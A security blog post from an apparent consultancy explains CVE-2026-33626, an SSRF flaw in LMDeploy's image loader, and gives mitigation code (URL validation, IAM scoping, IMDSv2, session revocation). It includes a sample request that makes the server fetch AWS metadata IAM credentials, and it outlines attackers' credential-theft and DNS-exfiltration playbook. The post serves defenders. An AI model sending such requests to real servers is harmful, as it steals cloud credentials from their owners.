On April 21, security researchers disclosed CVE-2026-33626, a Server-Side Request Forgery vulnerability in LMDeploy — one of the most popular open-source toolkits for running your own vision-language and LLM inference servers. By April 22, attackers had already hit Sysdig's honeypot systems.
Not 13 weeks later. Not 13 days.
12 hours and 31 minutes.
No proof-of-concept code needed. The vulnerability was trivially exploitable the moment the advisory went public. And the target wasn't just LMDeploy — it was everything sitting behind it.
What LMDeploy Is and Who Uses It
If you've ever wanted to run your own large language model — Qwen, InternVL, a fine-tuned variant pulled from Hugging Face — LMDeploy is one of the tools you reach for. Developed by Shanghai AI Laboratory, it's a widely used inference backend for organizations that want privacy-first AI: no prompts sent to OpenAI, no API costs scaling with volume, no vendor lock-in.
It's popular with exactly the kind of orgs we work with — NGOs handling sensitive case files, health organizations under data sovereignty requirements, government teams that can't push data to third-party APIs, and small businesses that want AI without handing their internal queries to someone else's servers.
The pitch is correct. Self-hosting your AI is a legitimate strategy. CVE-2026-33626 is a reminder that it comes with infrastructure responsibilities most teams haven't fully accounted for.
What the Bug Actually Does
The vulnerable function — load_image() in lmdeploy/vl/utils.py — accepts image URLs from incoming API requests and fetches them. The problem: it does zero validation on where those URLs actually point. Including whether they point somewhere that should never be reachable from outside your network.
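For a sense of what that missing validation would even look like, here's a minimal sketch of the kind of guard a hardened fetcher needs. This is our illustration, not LMDeploy's actual code; it resolves the hostname and refuses anything private, loopback, or link-local:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_image_url(url: str) -> bool:
    """Allow only http(s) URLs that resolve to public addresses.
    Illustrative sketch, not LMDeploy's actual patch."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        # Resolve the hostname: an attacker can hide 169.254.169.254
        # behind a DNS record, so check every address it maps to.
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        try:
            addr = ipaddress.ip_address(info[4][0])
        except ValueError:
            return False
        # 169.254.169.254 is link-local, so the IMDS fails this check.
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            return False
    return True
```

Even a check like this isn't airtight (DNS rebinding can race a resolve-then-fetch guard), which is part of why the real remediation below is patching plus IMDSv2 rather than URL filtering alone.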
Send a crafted request with an image URL set to http://169.254.169.254/ — the AWS Instance Metadata Service endpoint — and LMDeploy fetches it and returns the contents. Point the URL a level deeper, at /latest/meta-data/iam/security-credentials/, and the contents are your instance's temporary IAM credentials.
The same credentials your GPU server uses to pull model weights from S3, write logs, and — if someone was lazy with IAM permissions — reach other AWS services across the account.
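To make "trivially exploitable" concrete, here is roughly what such a request could look like against LMDeploy's OpenAI-compatible chat endpoint. The host and model name are placeholders we've invented, and the exact payload shape may vary by version; the point is that this is one ordinary-looking HTTP request:

```python
import requests

# Placeholder host and model name: 23333 is LMDeploy's default
# api_server port, the rest is invented for illustration.
resp = requests.post(
    "http://gpu-node.internal:23333/v1/chat/completions",
    json={
        "model": "internvl-chat",
        "messages": [{
            "role": "user",
            "content": [
                {"type": "text", "text": "Describe this image."},
                # The "image" is the AWS metadata service. A vulnerable
                # load_image() fetches it server-side, no questions asked.
                {"type": "image_url", "image_url": {
                    "url": "http://169.254.169.254/latest/meta-data/"
                           "iam/security-credentials/"
                }},
            ],
        }],
    },
    timeout=30,
)
print(resp.status_code, resp.text)
```

Depending on the deployment, the fetched contents surface in an error message or get woven into the model's reply. Either way, they've left the instance.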
In Sysdig's honeypot observation, attackers ran a complete playbook in a single eight-minute session:
- Fetched IMDS to grab cloud credentials
- Port-scanned the internal network (Redis, MySQL, internal admin interfaces)
- Exfiltrated data through DNS to an out-of-band endpoint they controlled
One unsecured API request, and they had the keys to the cloud account.
Why AI Infrastructure Is a Different Kind of Target
Here's what makes this worse than a typical web server CVE: LLM inference nodes almost always run on GPU instances with overly broad IAM permissions. Not because teams are careless — because when you're standing up a model server for the first time, you're focused on getting the model loaded and serving requests. You need the instance to pull weights from S3. You need it to log somewhere. You give it an IAM role with enough access to make things work, tell yourself you'll tighten it later, and move on.
"Later" almost never happens.
Attackers are aware of this pattern. If you compromise an LLM inference server, you've often compromised the cloud account it lives in — because those servers sit on instances with permissions that were sized for convenience, not least privilege.
This is a playbook that's becoming standard: scan for exposed AI inference servers, find one running with default or generous credentials, use the model server as a pivot point into the broader cloud environment. CVE-2026-33626 is the first widely exploited example. It won't be the last.
The 13-Hour Window Is the Real Lesson
The speed of exploitation is more than a dramatic headline. It tells you something specific about how the threat model has shifted.
When a CVE drops for a traditional piece of infrastructure — Apache, Nginx, a common database — attackers typically need time to build or adapt exploit code. Sometimes days, sometimes weeks. With CVE-2026-33626, there was nothing to adapt. The vulnerability was exploitable by reading the advisory and constructing a single HTTP request. No tooling required.
The gap between "vulnerability published" and "vulnerability being actively exploited" is now measured in hours for AI tooling — specifically because the attack surface is new, defenders don't have established processes to handle it fast, and the primitives are often trivially simple.
If your patching cadence is monthly, or "we'll get to it this sprint," that cadence is no longer viable for AI infrastructure components. This class of software is being actively watched by people with bad intentions.
Who Is Exposed
Any LMDeploy deployment that:
- Is running version 0.12.0 or earlier with vision-language (VL) support enabled
- Can receive API requests from any network where an attacker could land — including the public internet, or any machine that could be compromised in a phishing attack
If your team spun up an InternVL or InternLM-XComposer deployment on a cloud instance at any point in the last year, you need to check this today.
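Checking takes under a minute. A sketch, assuming your install exposes its version string the usual way:

```python
# Requires: pip install packaging (usually already present)
from packaging.version import Version

import lmdeploy

installed = Version(lmdeploy.__version__)
if installed < Version("0.12.1"):
    print(f"lmdeploy {installed} is vulnerable: "
          "upgrade with pip install -U 'lmdeploy>=0.12.1'")
else:
    print(f"lmdeploy {installed} includes the fix")
```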
What to Do Right Now
Upgrade to LMDeploy 0.12.1 or later. The patched version was released alongside the advisory. This is the fix.
Audit your IAM roles. Look at what your inference instance can actually access. S3 bucket access? Fine — scope it to the specific bucket holding your model weights. Cross-account assume-role? Almost certainly not needed. Admin-level permissions? Definitely not. The five minutes you spend scoping these down is worth more than any security tool you could buy.
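As a starting point, many inference nodes need no more than read access to one bucket. A hedged sketch with boto3; the bucket and role names are placeholders:

```python
import json

import boto3

# Least-privilege sketch: read model weights from one bucket, nothing
# else. "your-model-weights-bucket" and "inference-node-role" are
# placeholder names.
POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::your-model-weights-bucket",
        },
        {
            "Effect": "Allow",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::your-model-weights-bucket/*",
        },
    ],
}

iam = boto3.client("iam")
iam.put_role_policy(
    RoleName="inference-node-role",
    PolicyName="model-weights-read-only",
    PolicyDocument=json.dumps(POLICY),
)
```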
Confirm your inference API is not internet-facing. It should only be reachable from your application layer. If it's currently behind nothing — no VPC boundary, no security group restriction, no auth middleware — fix that before anything else. The model API is not meant to be a public endpoint.
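A quick way to spot the worst case is to scan for security groups that open the inference port to the world. This sketch assumes LMDeploy's default port of 23333; adjust it to yours:

```python
import boto3

PORT = 23333  # LMDeploy's default api_server port; change if yours differs

ec2 = boto3.client("ec2")
for sg in ec2.describe_security_groups()["SecurityGroups"]:
    for rule in sg.get("IpPermissions", []):
        # "-1" means all protocols/ports; otherwise check the port range.
        in_range = rule.get("IpProtocol") == "-1" or (
            rule.get("FromPort") is not None
            and rule["FromPort"] <= PORT <= rule["ToPort"]
        )
        if not in_range:
            continue
        for ip_range in rule.get("IpRanges", []):
            if ip_range.get("CidrIp") == "0.0.0.0/0":
                # Anyone on the internet can reach the model API.
                print(f"{sg['GroupId']} ({sg['GroupName']}) exposes "
                      f"port {PORT} to 0.0.0.0/0")
```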
Enable IMDSv2 on your GPU instances. AWS IMDSv2 requires a session-oriented token to access instance metadata, which breaks basic SSRF attacks targeting it. This doesn't patch the underlying LMDeploy bug, but it significantly limits blast radius. On AWS, enabling it is a configuration change, not a rebuild.
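Concretely, it's one API call per instance; the instance ID below is a placeholder:

```python
import boto3

ec2 = boto3.client("ec2")

# Require IMDSv2 session tokens on a GPU node. Run for each instance.
ec2.modify_instance_metadata_options(
    InstanceId="i-0123456789abcdef0",  # placeholder
    HttpTokens="required",   # IMDSv1's unauthenticated GET stops working
    HttpEndpoint="enabled",  # metadata stays available to legit callers
)
```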
Rotate credentials that may have been exposed. If your deployment was running a vulnerable version and had any internet-facing surface, treat your IAM credentials as potentially compromised. Rotate them. This is an annoying hour of work. It's better than the alternative.
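For an instance role, "rotate" in practice means revoking every session issued before a cutoff, which is the same thing the IAM console's revoke-sessions button does. A sketch with a placeholder role name:

```python
import json
from datetime import datetime, timezone

import boto3

# Deny everything to sessions issued before right now. Existing stolen
# credentials become useless; the instance picks up fresh ones on its
# next credential refresh.
cutoff = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
revoke = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*",
        "Condition": {"DateLessThan": {"aws:TokenIssueTime": cutoff}},
    }],
}
boto3.client("iam").put_role_policy(
    RoleName="inference-node-role",  # placeholder
    PolicyName="RevokeOldSessions",
    PolicyDocument=json.dumps(revoke),
)
```

Sessions issued after the cutoff are unaffected, so the instance recovers on its own the next time it refreshes its role credentials.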
The Broader Pattern
CVE-2026-33626 is notable as the first LLM inference toolkit vulnerability to be actively exploited in the wild. The self-hosted AI movement — running your own models for privacy, cost, and control — is genuinely good strategy. We've implemented it for clients and we stand behind it. But it introduces a class of infrastructure that most teams aren't yet treating as the attack surface it is.
AI model servers are not appliances you set up once and forget. They're networked services running on privileged cloud instances, serving complex codepaths that were written at speed by teams primarily focused on model quality, not security hardening.
The tradeoff is manageable. You can run your own AI stack securely. But getting there means treating your inference server with the same rigor you'd apply to anything else sitting between the internet and your cloud credentials.
If you're running self-hosted AI and want a quick review of how it's set up — network exposure, IAM scoping, model server configuration — that's a couple of hours of work we do regularly. Better to find the gaps now than have someone else find them twelve hours after the next advisory drops.